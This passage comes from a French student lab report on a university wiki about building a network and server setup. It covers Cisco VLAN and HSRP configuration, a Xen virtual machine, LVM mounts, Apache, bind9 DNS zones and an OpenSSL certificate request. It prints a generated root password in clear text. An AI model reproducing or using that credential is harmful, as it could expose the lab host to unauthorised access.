   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51426</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51426"/>
				<updated>2019-11-29T13:07:10Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Cryptage de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS/DNSSEC bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires le gestionnaire de RAID Logiciel Mdadm ====&lt;br /&gt;
Mdadm est une solution de RAID logiciel très fiable et très répandue dans la communauté Linux. Ce paquetage sera nécessaire pour la création d'un RAID5&lt;br /&gt;
   apt install mdadm&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
